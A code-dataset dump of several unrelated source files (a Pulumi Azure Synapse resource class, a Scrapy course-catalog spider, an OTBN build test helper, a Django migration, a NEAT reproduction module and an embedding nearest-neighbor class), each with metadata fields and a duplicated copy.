    def sql_pool_name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "sql_pool_name", value)

    @property
    @pulumi.getter
    def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """Resource tags."""
        return pulumi.get(self, "tags")

    @tags.setter
    def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "tags", value)
# Auto-generated by the Pulumi SDK generator — limit hand edits to comments.
class SqlPoolsV3(pulumi.CustomResource):
    """A sql pool resource."""
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                 sql_pool_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 workspace_name: Optional[pulumi.Input[str]] = None,
                 __props__=None):
        """Construct from individual resource properties."""
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: SqlPoolsV3Args,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """Construct from a SqlPoolsV3Args bundle."""
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the two overloads above based on the runtime args.
        resource_args, opts = _utilities.get_resource_args_opts(SqlPoolsV3Args, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)

    def _internal_init(__self__,
                       resource_name: str,
                       opts: Optional[pulumi.ResourceOptions] = None,
                       location: Optional[pulumi.Input[str]] = None,
                       resource_group_name: Optional[pulumi.Input[str]] = None,
                       sku: Optional[pulumi.Input[pulumi.InputType['SkuArgs']]] = None,
                       sql_pool_name: Optional[pulumi.Input[str]] = None,
                       tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                       workspace_name: Optional[pulumi.Input[str]] = None,
                       __props__=None):
        # Standard generated boilerplate: normalize opts and validate inputs.
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)

            __props__.__dict__["location"] = location
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["sku"] = sku
            __props__.__dict__["sql_pool_name"] = sql_pool_name
            __props__.__dict__["tags"] = tags
            if workspace_name is None and not opts.urn:
                raise TypeError("Missing required property 'workspace_name'")
            __props__.__dict__["workspace_name"] = workspace_name
            # Output-only properties start as None and are filled by the engine.
            __props__.__dict__["current_service_objective_name"] = None
            __props__.__dict__["kind"] = None
            __props__.__dict__["name"] = None
            __props__.__dict__["requested_service_objective_name"] = None
            __props__.__dict__["sql_pool_guid"] = None
            __props__.__dict__["status"] = None
            __props__.__dict__["system_data"] = None
            __props__.__dict__["type"] = None
        # Aliases cover every API version of this resource type.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:synapse/v20200401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20190601preview:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20201201:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210301:SqlPoolsV3"), pulumi.Alias(type_="azure-native:synapse/v20210401preview:SqlPoolsV3"), pulumi.Alias(type_="azure-nextgen:synapse/v20210401preview:SqlPoolsV3")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(SqlPoolsV3, __self__).__init__(
            'azure-native:synapse/v20200401preview:SqlPoolsV3',
            resource_name,
            __props__,
            opts)

    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'SqlPoolsV3':
        """Look up an existing SqlPoolsV3 by name and provider id."""
        opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))

        # All properties are None here; the engine populates them from state.
        __props__ = SqlPoolsV3Args.__new__(SqlPoolsV3Args)

        __props__.__dict__["current_service_objective_name"] = None
        __props__.__dict__["kind"] = None
        __props__.__dict__["location"] = None
        __props__.__dict__["name"] = None
        __props__.__dict__["requested_service_objective_name"] = None
        __props__.__dict__["sku"] = None
        __props__.__dict__["sql_pool_guid"] = None
        __props__.__dict__["status"] = None
        __props__.__dict__["system_data"] = None
        __props__.__dict__["tags"] = None
        __props__.__dict__["type"] = None
        return SqlPoolsV3(resource_name, opts=opts, __props__=__props__)

    @property
    @pulumi.getter(name="currentServiceObjectiveName")
    def current_service_objective_name(self) -> pulumi.Output[str]:
        """Current service level objective name of the sql pool."""
        return pulumi.get(self, "current_service_objective_name")

    @property
    @pulumi.getter
    def kind(self) -> pulumi.Output[str]:
        """Kind of SqlPool."""
        return pulumi.get(self, "kind")

    @property
    @pulumi.getter
    def location(self) -> pulumi.Output[str]:
        """The geo-location where the resource lives."""
        return pulumi.get(self, "location")

    @property
    @pulumi.getter
    def name(self) -> pulumi.Output[str]:
        """The name of the resource."""
        return pulumi.get(self, "name")

    @property
    @pulumi.getter(name="requestedServiceObjectiveName")
    def requested_service_objective_name(self) -> pulumi.Output[str]:
        """Requested service level objective name of the sql pool."""
        return pulumi.get(self, "requested_service_objective_name")

    @property
    @pulumi.getter
    def sku(self) -> pulumi.Output[Optional['outputs.SkuResponse']]:
        """The sql pool SKU."""
        return pulumi.get(self, "sku")

    @property
    @pulumi.getter(name="sqlPoolGuid")
    def sql_pool_guid(self) -> pulumi.Output[str]:
        """The Guid of the sql pool."""
        return pulumi.get(self, "sql_pool_guid")

    @property
    @pulumi.getter
    def status(self) -> pulumi.Output[str]:
        """The status of the sql pool."""
        return pulumi.get(self, "status")

    @property
    @pulumi.getter(name="systemData")
    def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
        """SystemData of SqlPool."""
        return pulumi.get(self, "system_data")

    @property
    @pulumi.getter
    def tags(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
        """Resource tags."""
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter
    def type(self) -> pulumi.Output[str]:
        """Azure resource type string."""
        return pulumi.get(self, "type")
| true | true |
7900e8133f18db39491de69fa88236e8659bfe45 | 3,358 | py | Python | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | UW_Madison/UW_Madison/spiders/uw_madison_courses3.py | Nouldine/MyCrawlerSystem | 7bba8ba3ec76e10f70a35700602812ee6f039b63 | [
"MIT"
] | null | null | null | from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from UW_Madison.items import UwMadisonItem
class Madison_courses(CrawlSpider):
    """Crawl the UW-Madison course guide and scrape course descriptions."""

    name = 'uw_madison5'
    allowed_domains = ['wisc.edu']
    start_urls = [
        "http://guide.wisc.edu/courses/",
    ]

    # Follow every guide page under /courses/ and parse each one.
    # Fix: the original allow pattern was r'ttp://guide.wisc.edu/courses/'
    # (missing 'h', unescaped dots).  It matched only because LinkExtractor
    # searches the regex anywhere in the URL; anchor it properly instead,
    # still accepting both http and https.
    rules = (
        Rule(LinkExtractor(allow=(r'https?://guide\.wisc\.edu/courses/',)),
             callback='parse_httpbin',
             follow=True),
    )

    def parse_httpbin(self, response):
        """Yield one UwMadisonItem with this page's course-block fields.

        Each selector extracts a list covering every course block on the
        page, so the item fields are parallel lists.
        """
        items = UwMadisonItem()
        items['course'] = response.css('span.courseblockcode::text').extract()
        items['title'] = response.css(
            'div.sc_sccoursedescs > div.courseblock > p.courseblocktitle > strong::text').extract()
        items['unit'] = response.css('.courseblockcredits::text').extract()
        items['description'] = response.css('.courseblockdesc::text').extract()
        items['prerequisites'] = response.css(
            'p.courseblockextra.noindent.clearfix > span.cbextra-data > .bubblelink::text').extract()
        yield items
| 29.2 | 133 | 0.638177 | from scrapy import Spider
from scrapy.spiders import CrawlSpider, Rule
from scrapy.selector import Selector
from scrapy.contrib.spiders import CrawlSpider, Rule
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.linkextractors import LinkExtractor
import scrapy
from scrapy.spidermiddlewares.httperror import HttpError
from twisted.internet.error import DNSLookupError
from twisted.internet.error import TimeoutError, TCPTimedOutError
from UW_Madison.items import UwMadisonItem
class Madison_courses(CrawlSpider):
    """Crawl guide.wisc.edu course pages and extract course metadata."""
    name = 'uw_madison5'
    allowed_domains = ['wisc.edu']
    start_urls = [
        "http://guide.wisc.edu/courses/",
    ]
    # NOTE(review): the allow pattern starts with 'ttp://' (missing the 'h')
    # and leaves '.' unescaped — it still matches because LinkExtractor
    # searches the regex anywhere in the URL, but confirm this is intended.
    rules = (
        Rule(LinkExtractor(allow=(r'ttp://guide.wisc.edu/courses/')),
             callback='parse_httpbin',
             follow=True
             ),
    )
    def parse_httpbin(self, response):
        """Yield one UwMadisonItem holding this page's course-block fields."""
        items = UwMadisonItem()
        # Each selector returns a list covering every course block on the page.
        course = response.css('span.courseblockcode::text').extract()
        title = response.css('div.sc_sccoursedescs > div.courseblock > p.courseblocktitle > strong::text').extract()
        unit = response.css('.courseblockcredits::text').extract()
        description = response.css('.courseblockdesc::text').extract()
        prerequisites = response.css('p.courseblockextra.noindent.clearfix > span.cbextra-data > .bubblelink::text').extract()
        items['course'] = course
        items['title'] = title
        items['unit'] = unit
        items['description'] = description
        items['prerequisites'] = prerequisites
        yield items
| true | true |
7900e89dbe75340382e3e287beed972b744c3dca | 857 | py | Python | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | hw/ip/otbn/dv/otbnsim/test/testutil.py | draperlaboratory/opentitan | 5802fd8fddff95a905671054b1554f87c9ca6b96 | [
"Apache-2.0"
] | null | null | null | # Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
import os
import subprocess
OTBN_DIR = os.path.join(os.path.dirname(__file__), '../../..')
UTIL_DIR = os.path.join(OTBN_DIR, 'util')
SIM_DIR = os.path.join(os.path.dirname(__file__), '..')
def asm_and_link_one_file(asm_path: str, work_dir: str) -> str:
    '''Assemble and link file at asm_path in work_dir.

    Returns the path to the resulting ELF
    '''
    assembler = os.path.join(UTIL_DIR, 'otbn-as')
    linker = os.path.join(UTIL_DIR, 'otbn-ld')
    obj_path = os.path.join(work_dir, 'tst.o')
    elf_path = os.path.join(work_dir, 'tst')
    # Assemble, then link; check=True raises if either tool fails.
    for cmd in ([assembler, '-o', obj_path, asm_path],
                [linker, '-o', elf_path, obj_path]):
        subprocess.run(cmd, check=True)
    return elf_path
| 30.607143 | 74 | 0.690782 |
import os
import subprocess
OTBN_DIR = os.path.join(os.path.dirname(__file__), '../../..')
UTIL_DIR = os.path.join(OTBN_DIR, 'util')
SIM_DIR = os.path.join(os.path.dirname(__file__), '..')
def asm_and_link_one_file(asm_path: str, work_dir: str) -> str:
    '''Assemble and link the file at asm_path inside work_dir.

    Runs the otbn-as assembler and then the otbn-ld linker (both found in
    UTIL_DIR) and returns the path to the resulting ELF binary. Either tool
    failing raises subprocess.CalledProcessError because of check=True.
    '''
    otbn_as = os.path.join(UTIL_DIR, 'otbn-as')
    otbn_ld = os.path.join(UTIL_DIR, 'otbn-ld')
    obj_path = os.path.join(work_dir, 'tst.o')
    elf_path = os.path.join(work_dir, 'tst')
    # Assemble the source to an object file, then link it into the ELF.
    subprocess.run([otbn_as, '-o', obj_path, asm_path], check=True)
    subprocess.run([otbn_ld, '-o', elf_path, obj_path], check=True)
    return elf_path
| true | true |
7900e8d40d67998b5d9cf4a9cb039c3f7628ea62 | 1,171 | py | Python | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | 1 | 2021-06-12T19:08:57.000Z | 2021-06-12T19:08:57.000Z | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | null | null | null | django_project/user_profile/migrations/0003_auto_20210526_1731.py | zhumakova/Django | f162b23d53883d3b0c654f8e7790f4bf93e20693 | [
"MIT"
] | null | null | null | # Generated by Django 3.2.3 on 2021-05-26 11:31
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    # Auto-generated Django (3.2.3) schema migration: redefines Profile.age
    # and introduces the Order model linking users to spa services.
    dependencies = [
        # Order.user points at the swappable user model.
        migrations.swappable_dependency(settings.AUTH_USER_MODEL),
        # Order.service points at spa.Service, so that app's migration state
        # must exist first.
        ('spa', '0003_alter_service_master'),
        ('user_profile', '0002_auto_20210526_1647'),
    ]
    operations = [
        # Profile.age becomes a plain (required) IntegerField.
        migrations.AlterField(
            model_name='profile',
            name='age',
            field=models.IntegerField(),
        ),
        # New Order model. Both foreign keys are nullable with SET_NULL so an
        # order row survives deletion of its user or service.
        migrations.CreateModel(
            name='Order',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('date_created', models.DateTimeField(auto_now_add=True)),
                ('status', models.CharField(max_length=40)),
                ('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='spa.service')),
                ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
            ],
        ),
    ]
| 35.484848 | 130 | 0.624253 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('spa', '0003_alter_service_master'),
('user_profile', '0002_auto_20210526_1647'),
]
operations = [
migrations.AlterField(
model_name='profile',
name='age',
field=models.IntegerField(),
),
migrations.CreateModel(
name='Order',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('date_created', models.DateTimeField(auto_now_add=True)),
('status', models.CharField(max_length=40)),
('service', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='spa.service')),
('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
7900e978294db63f482b38c5b128fdc347b80a61 | 8,371 | py | Python | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | neat_local/reproduction.py | Osrip/Novelty_criticality_PyTorch-NEAT | ff37eede4aea2cbb4075414a960477c215219f73 | [
"Apache-2.0"
] | null | null | null | """
Handles creation of genomes, either from scratch or by sexual or
asexual reproduction from parents.
"""
from __future__ import division
import math
import random
from itertools import count
from neat.config import ConfigParameter, DefaultClassConfig
from neat.math_util import mean
from neat.six_util import iteritems, itervalues
# TODO: Provide some sort of optional cross-species performance criteria, which
# are then used to control stagnation and possibly the mutation rate
# configuration. This scheme should be adaptive so that species do not evolve
# to become "cautious" and only make very slow progress.
class DefaultReproduction(DefaultClassConfig):
    """
    Implements the default NEAT-python reproduction scheme:
    explicit fitness sharing with fixed-time species stagnation.
    """
    @classmethod
    def parse_config(cls, param_dict):
        # Config schema consumed by this class: number of elites copied
        # unchanged per species, fraction of each species allowed to act as
        # parents, and the floor on per-species size.
        return DefaultClassConfig(param_dict,
                                  [ConfigParameter('elitism', int, 0),
                                   ConfigParameter('survival_threshold', float, 0.2),
                                   ConfigParameter('min_species_size', int, 2)])
    def __init__(self, config, reporters, stagnation):
        """Store collaborators and initialize genome-key/ancestry bookkeeping."""
        # pylint: disable=super-init-not-called
        self.reproduction_config = config
        self.reporters = reporters
        # Source of unique, monotonically increasing genome keys (from 1).
        self.genome_indexer = count(1)
        self.stagnation = stagnation
        # Maps genome key -> tuple of parent keys (empty for de-novo genomes).
        self.ancestors = {}
    def create_new(self, genome_type, genome_config, num_genomes):
        """Create `num_genomes` brand-new genomes, keyed by fresh IDs."""
        new_genomes = {}
        for i in range(num_genomes):
            key = next(self.genome_indexer)
            g = genome_type(key)
            g.configure_new(genome_config)
            new_genomes[key] = g
            # De-novo genomes have no ancestors.
            self.ancestors[key] = tuple()
        return new_genomes
    @staticmethod
    def compute_spawn(adjusted_fitness, previous_sizes, pop_size, min_species_size):
        """Compute the proper number of offspring per species (proportional to fitness)."""
        af_sum = sum(adjusted_fitness)
        spawn_amounts = []
        for af, ps in zip(adjusted_fitness, previous_sizes):
            if af_sum > 0:
                # Fitness-proportional target size, floored at the minimum.
                s = max(min_species_size, af / af_sum * pop_size)
            else:
                s = min_species_size
            # Move each species halfway toward its target (at least one member
            # per generation) to damp oscillations in species sizes.
            d = (s - ps) * 0.5
            c = int(round(d))
            spawn = ps
            if abs(c) > 0:
                spawn += c
            elif d > 0:
                spawn += 1
            elif d < 0:
                spawn -= 1
            spawn_amounts.append(spawn)
        # Normalize the spawn amounts so that the next generation is roughly
        # the population size requested by the user.
        total_spawn = sum(spawn_amounts)
        norm = pop_size / total_spawn
        spawn_amounts = [max(min_species_size, int(round(n * norm))) for n in spawn_amounts]
        return spawn_amounts
    def reproduce(self, config, species, pop_size, generation):
        """
        Handles creation of genomes, either from scratch or by sexual or
        asexual reproduction from parents.

        Mutates `species` (rebuilds species.species) and returns the new
        population as a dict of genome key -> genome.
        """
        # TODO: I don't like this modification of the species and stagnation objects,
        # because it requires internal knowledge of the objects.
        # Filter out stagnated species, collect the set of non-stagnated
        # species members, and compute their average adjusted fitness.
        # The average adjusted fitness scheme (normalized to the interval
        # [0, 1]) allows the use of negative fitness values without
        # interfering with the shared fitness scheme.
        all_fitnesses = []
        remaining_species = []
        for stag_sid, stag_s, stagnant in self.stagnation.update(species, generation):
            if stagnant:
                self.reporters.species_stagnant(stag_sid, stag_s)
            else:
                all_fitnesses.extend(m.fitness for m in itervalues(stag_s.members))
                remaining_species.append(stag_s)
        # The above comment was not quite what was happening - now getting fitnesses
        # only from members of non-stagnated species.
        # No species left.
        if not remaining_species:
            species.species = {}
            return {} # was []
        # Find minimum/maximum fitness across the entire population, for use in
        # species adjusted fitness computation.
        min_fitness = min(all_fitnesses)
        max_fitness = max(all_fitnesses)
        # Do not allow the fitness range to be zero, as we divide by it below.
        # TODO: The ``1.0`` below is rather arbitrary, and should be configurable.
        fitness_range = max(1.0, max_fitness - min_fitness)
        for afs in remaining_species:
            # Compute adjusted fitness: mean member fitness, shifted/scaled
            # into [0, 1] relative to the whole population.
            msf = mean([m.fitness for m in itervalues(afs.members)])
            af = (msf - min_fitness) / fitness_range
            afs.adjusted_fitness = af
        adjusted_fitnesses = [s.adjusted_fitness for s in remaining_species]
        avg_adjusted_fitness = mean(adjusted_fitnesses) # type: float
        self.reporters.info("Average adjusted fitness: {:.3f}".format(avg_adjusted_fitness))
        # Compute the number of new members for each species in the new generation.
        previous_sizes = [len(s.members) for s in remaining_species]
        min_species_size = self.reproduction_config.min_species_size
        # Isn't the effective min_species_size going to be max(min_species_size,
        # self.reproduction_config.elitism)? That would probably produce more accurate tracking
        # of population sizes and relative fitnesses... doing. TODO: document.
        min_species_size = max(min_species_size,self.reproduction_config.elitism)
        # TODO: THIS PROBABLY CAUSES POPULATION TO DOUBLE. Is an array of 2s of len ~232 here but ~ 112 in original
        # TODO: BECAUSE OF ADJUSTED_FITNESSES ALSO BEING 232 INSTEAD OF 112
        # TODO: 232 is number of species.. so probably rather an effect of increased population, not the cause...
        spawn_amounts = self.compute_spawn(adjusted_fitnesses, previous_sizes,
                                           pop_size, min_species_size)
        new_population = {}
        species.species = {}
        for spawn, s in zip(spawn_amounts, remaining_species):
            # If elitism is enabled, each species always at least gets to retain its elites.
            spawn = max(spawn, self.reproduction_config.elitism)
            assert spawn > 0
            # The species has at least one member for the next generation, so retain it.
            old_members = list(iteritems(s.members))
            s.members = {}
            species.species[s.key] = s
            # Sort members in order of descending fitness.
            old_members.sort(reverse=True, key=lambda x: x[1].fitness)
            # Transfer elites to new generation.
            if self.reproduction_config.elitism > 0:
                for i, m in old_members[:self.reproduction_config.elitism]:
                    new_population[i] = m
                    spawn -= 1
            if spawn <= 0:
                continue
            # Only use the survival threshold fraction to use as parents for the next generation.
            repro_cutoff = int(math.ceil(self.reproduction_config.survival_threshold *
                                         len(old_members)))
            # Use at least two parents no matter what the threshold fraction result is.
            repro_cutoff = max(repro_cutoff, 2)
            old_members = old_members[:repro_cutoff]
            # Randomly choose parents and produce the number of offspring allotted to the species.
            while spawn > 0:
                spawn -= 1
                parent1_id, parent1 = random.choice(old_members)
                parent2_id, parent2 = random.choice(old_members)
                # Note that if the parents are not distinct, crossover will produce a
                # genetically identical clone of the parent (but with a different ID).
                gid = next(self.genome_indexer)
                child = config.genome_type(gid)
                child.configure_crossover(parent1, parent2, config.genome_config)
                child.mutate(config.genome_config)
                new_population[gid] = child
                self.ancestors[gid] = (parent1_id, parent2_id)
        return new_population
| 43.598958 | 115 | 0.632899 | from __future__ import division
import math
import random
from itertools import count
from neat.config import ConfigParameter, DefaultClassConfig
from neat.math_util import mean
from neat.six_util import iteritems, itervalues
class DefaultReproduction(DefaultClassConfig):
@classmethod
def parse_config(cls, param_dict):
return DefaultClassConfig(param_dict,
[ConfigParameter('elitism', int, 0),
ConfigParameter('survival_threshold', float, 0.2),
ConfigParameter('min_species_size', int, 2)])
def __init__(self, config, reporters, stagnation):
self.reproduction_config = config
self.reporters = reporters
self.genome_indexer = count(1)
self.stagnation = stagnation
self.ancestors = {}
def create_new(self, genome_type, genome_config, num_genomes):
new_genomes = {}
for i in range(num_genomes):
key = next(self.genome_indexer)
g = genome_type(key)
g.configure_new(genome_config)
new_genomes[key] = g
self.ancestors[key] = tuple()
return new_genomes
@staticmethod
def compute_spawn(adjusted_fitness, previous_sizes, pop_size, min_species_size):
af_sum = sum(adjusted_fitness)
spawn_amounts = []
for af, ps in zip(adjusted_fitness, previous_sizes):
if af_sum > 0:
s = max(min_species_size, af / af_sum * pop_size)
else:
s = min_species_size
d = (s - ps) * 0.5
c = int(round(d))
spawn = ps
if abs(c) > 0:
spawn += c
elif d > 0:
spawn += 1
elif d < 0:
spawn -= 1
spawn_amounts.append(spawn)
total_spawn = sum(spawn_amounts)
norm = pop_size / total_spawn
spawn_amounts = [max(min_species_size, int(round(n * norm))) for n in spawn_amounts]
return spawn_amounts
def reproduce(self, config, species, pop_size, generation):
# because it requires internal knowledge of the objects.
# Filter out stagnated species, collect the set of non-stagnated
# species members, and compute their average adjusted fitness.
# The average adjusted fitness scheme (normalized to the interval
# [0, 1]) allows the use of negative fitness values without
# interfering with the shared fitness scheme.
all_fitnesses = []
remaining_species = []
for stag_sid, stag_s, stagnant in self.stagnation.update(species, generation):
if stagnant:
self.reporters.species_stagnant(stag_sid, stag_s)
else:
all_fitnesses.extend(m.fitness for m in itervalues(stag_s.members))
remaining_species.append(stag_s)
# The above comment was not quite what was happening - now getting fitnesses
# only from members of non-stagnated species.
# No species left.
if not remaining_species:
species.species = {}
return {} # was []
# Find minimum/maximum fitness across the entire population, for use in
# species adjusted fitness computation.
min_fitness = min(all_fitnesses)
max_fitness = max(all_fitnesses)
# Do not allow the fitness range to be zero, as we divide by it below.
# TODO: The ``1.0`` below is rather arbitrary, and should be configurable.
fitness_range = max(1.0, max_fitness - min_fitness)
for afs in remaining_species:
# Compute adjusted fitness.
msf = mean([m.fitness for m in itervalues(afs.members)])
af = (msf - min_fitness) / fitness_range
afs.adjusted_fitness = af
adjusted_fitnesses = [s.adjusted_fitness for s in remaining_species]
avg_adjusted_fitness = mean(adjusted_fitnesses) # type: float
self.reporters.info("Average adjusted fitness: {:.3f}".format(avg_adjusted_fitness))
# Compute the number of new members for each species in the new generation.
previous_sizes = [len(s.members) for s in remaining_species]
min_species_size = self.reproduction_config.min_species_size
# Isn't the effective min_species_size going to be max(min_species_size,
min_species_size = max(min_species_size,self.reproduction_config.elitism)
spawn_amounts = self.compute_spawn(adjusted_fitnesses, previous_sizes,
pop_size, min_species_size)
new_population = {}
species.species = {}
for spawn, s in zip(spawn_amounts, remaining_species):
spawn = max(spawn, self.reproduction_config.elitism)
assert spawn > 0
old_members = list(iteritems(s.members))
s.members = {}
species.species[s.key] = s
old_members.sort(reverse=True, key=lambda x: x[1].fitness)
if self.reproduction_config.elitism > 0:
for i, m in old_members[:self.reproduction_config.elitism]:
new_population[i] = m
spawn -= 1
if spawn <= 0:
continue
repro_cutoff = int(math.ceil(self.reproduction_config.survival_threshold *
len(old_members)))
repro_cutoff = max(repro_cutoff, 2)
old_members = old_members[:repro_cutoff]
while spawn > 0:
spawn -= 1
parent1_id, parent1 = random.choice(old_members)
parent2_id, parent2 = random.choice(old_members)
gid = next(self.genome_indexer)
child = config.genome_type(gid)
child.configure_crossover(parent1, parent2, config.genome_config)
child.mutate(config.genome_config)
new_population[gid] = child
self.ancestors[gid] = (parent1_id, parent2_id)
return new_population
| true | true |
7900ea3e9c2dea2b931ed456e64ca581ba00efea | 1,325 | py | Python | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | Word2Vec/NearestNeighbor.py | bi3mer/Word2Vec | 55297c4f10c5dbfdcaf93b01282808efdd275956 | [
"MIT"
] | null | null | null | from heapq import heappush, nsmallest
import numpy as np
class NearestNeighbor():
    """Nearest-neighbour lookup over a word-embedding table.

    Parameters
    ----------
    embeddings : mapping of word -> vector; must support iteration over the
        words and item access by word.
    encodings : object exposing word_in_vocab(word) -> bool.
    config : object exposing unknown_word, the fallback key used for
        out-of-vocabulary words.
    """
    def __init__(self, embeddings, encodings, config):
        self.embeddings = embeddings
        self.encodings = encodings
        self.config = config

    def euclidian_distance(self, e1, e2):
        '''Euclidean (L2) distance between two embedding vectors.

        https://stackoverflow.com/questions/1401712/how-can-the-euclidean-distance-be-calculated-with-numpy
        '''
        return np.linalg.norm(e1 - e2)

    def get_embedding(self, word):
        '''Return the embedding for `word`, falling back to the configured
        unknown-word embedding when `word` is out of vocabulary.'''
        if self.encodings.word_in_vocab(word):
            return self.embeddings[word]
        # BUGFIX: was `config.unknown_word`, referencing an undefined global
        # and raising NameError for any OOV word; the config lives on self.
        return self.embeddings[self.config.unknown_word]

    def nearest_neighbors(self, word, count=1):
        '''Return the `count` nearest (distance, word) pairs to `word`,
        ordered by increasing distance; `word` itself is excluded.'''
        embedding = self.get_embedding(word)
        # Stream (distance, word) pairs straight into heapq.nsmallest, which
        # only tracks the best `count` candidates instead of first building a
        # heap over the entire vocabulary (resolves the previous TODOs).
        candidates = (
            (self.euclidian_distance(embedding, self.embeddings[w]), w)
            for w in self.embeddings
            if w != word
        )
        return nsmallest(count, candidates)
| 34.868421 | 107 | 0.644528 | from heapq import heappush, nsmallest
import numpy as np
class NearestNeighbor():
    """Nearest-neighbour lookup over a word-embedding table.

    embeddings: mapping of word -> vector (iterable over words, indexable).
    encodings: object exposing word_in_vocab(word) -> bool.
    config: object exposing unknown_word, the out-of-vocabulary fallback key.
    """
    def __init__(self, embeddings, encodings, config):
        self.embeddings = embeddings
        self.encodings = encodings
        self.config = config

    def euclidian_distance(self, e1, e2):
        # Euclidean (L2) distance between two embedding vectors.
        return np.linalg.norm(e1 - e2)

    def get_embedding(self, word):
        # BUGFIX: previously read `config.unknown_word` (undefined global,
        # NameError on any OOV word); the configuration object lives on self.
        if self.encodings.word_in_vocab(word):
            return self.embeddings[word]
        return self.embeddings[self.config.unknown_word]

    def nearest_neighbors(self, word, count=1):
        # Return the `count` nearest (distance, word) pairs, ascending by
        # distance, excluding `word` itself. nsmallest consumes the generator
        # while only retaining the best `count` candidates.
        embedding = self.get_embedding(word)
        candidates = (
            (self.euclidian_distance(embedding, self.embeddings[w]), w)
            for w in self.embeddings
            if w != word
        )
